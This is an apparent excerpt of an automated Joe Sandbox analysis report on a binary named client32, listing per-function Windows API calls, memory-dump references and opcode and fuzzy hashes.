Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 11037BCF
_strncpy.LIBCMT ref: 11037BFB
_strncpy.LIBCMT ref: 11037C38
_malloc.LIBCMT ref: 11037C72
_strncpy.LIBCMT ref: 11037C83
_strncpy.LIBCMT ref: 11037CC3
_malloc.LIBCMT ref: 11037CF6
_strncpy.LIBCMT ref: 11037D0C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
String ID:
API String ID: 1102513549-0
Opcode ID: 2f853e7c89ef7a4da3a784eaa8ed33469ea7ff7b94cf3577d369e185d65f398d
Instruction ID: 0993799ff6b1df3d5f9af4c11cbbccce243fc3b3dc02a8004556a834a5a0d823
Opcode Fuzzy Hash: 2f853e7c89ef7a4da3a784eaa8ed33469ea7ff7b94cf3577d369e185d65f398d
Instruction Fuzzy Hash: BC5176B5D142259FDB20DFB8CD84BCABBBCEF15308F004195958897240EBB5A995CFE1

Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 11039768
GetDlgItem.USER32(00000000,00000001), ref: 11039771
IsWindowEnabled.USER32(00000000), ref: 11039778
PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
GetParent.USER32(?), ref: 110397B6
GetWindowRect.USER32(?,?), ref: 110397C3
IntersectRect.USER32(?,?,?), ref: 110397FC
GetWindowRect.USER32(00000000,?), ref: 11039836
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
String ID:
API String ID: 818519836-0
Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50

Function 11153730 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11153763
CreateCompatibleDC.GDI32(00000000), ref: 11153779
SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
SelectObject.GDI32(00000000,00000000), ref: 1115389B
SelectObject.GDI32(00000000,?), ref: 111538C1
SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
DeleteDC.GDI32(00000000), ref: 111538D8
ReleaseDC.USER32(00000000,?), ref: 111538E7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
String ID:
API String ID: 602542589-0
Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68

Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,75BF3760,00000000,111F1590,?,110CD955,00000000,75BF3760), ref: 111103E8
Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110CD955,00000000,75BF3760), ref: 11110408

EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
String ID:
API String ID: 1497311044-0
Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0

Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000003), ref: 111135A7
FillRect.USER32(?,?,00000000), ref: 111135C4
FillRect.USER32(?,?,00000000), ref: 111135D2
SetROP2.GDI32(?,00000007), ref: 111135FE
SetBkMode.GDI32(?,?), ref: 1111360A
SetBkColor.GDI32(?,?), ref: 11113615
SetTextColor.GDI32(?,?), ref: 11113620
SetTextJustification.GDI32(?,?,?), ref: 11113631
SetTextCharacterExtra.GDI32(?,?), ref: 1111363D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
String ID:
API String ID: 1094208222-0
Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0

Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60

Function 1109D980 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Event$FileUnmapView
String ID:
API String ID: 2427653990-0
Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50

Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
GetBkColor.GDI32(?), ref: 1101F5BE
GetTextColor.GDI32(?), ref: 1101F645

Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064

Strings

VUUU, xrefs: 1101F690
VUUU, xrefs: 1101F5F6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
String ID: VUUU$VUUU
API String ID: 179481525-3149182767
Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94

Function 110B78A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

Part of subcall function 110B0730: _memset.LIBCMT ref: 110B073C
Part of subcall function 110B0730: _memset.LIBCMT ref: 110B076D

Part of subcall function 110B0FA0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0FA6
Part of subcall function 110B0FA0: timeGetTime.WINMM(111F10F8,111E6C98,?), ref: 110B1075

WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D
GetDC.USER32(00000000), ref: 110B7951
GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B795C
GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7967
ReleaseDC.USER32(00000000,00000000), ref: 110B7973

Part of subcall function 110B3560: SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
Part of subcall function 110B3560: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
Part of subcall function 110B3560: CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
Part of subcall function 110B3560: CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
Part of subcall function 110B3560: WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
Part of subcall function 110B3560: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0

Strings

_debug, xrefs: 110B78C4
TraceScrape, xrefs: 110B78B7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
String ID: TraceScrape$_debug
API String ID: 2936113293-4091781993
Opcode ID: c0a2ef568abd564d7af5b6c1d30ae4c0d865c04e90584bcac43ba32ef6f36e6b
Instruction ID: beb9be5f3decd216f1517493ed5af73f7f61b8e2793af04975b89e9167c73652
Opcode Fuzzy Hash: c0a2ef568abd564d7af5b6c1d30ae4c0d865c04e90584bcac43ba32ef6f36e6b
Instruction Fuzzy Hash: 5F41C779E042465BEB05CFA4C9C1FAF7BB5EB88704F1405A8E805AB285EA70ED04C7E4

Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F

Strings

PCICTL, xrefs: 110617BE, 110617C9
ConfigList, xrefs: 11061855, 1106187F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
String ID: ConfigList$PCICTL
API String ID: 4014706405-1939909508
Opcode ID: cae4a2d1f4de0a4020005886155d60d9723e04be6fdd3d8070ab79db40d2f8ad
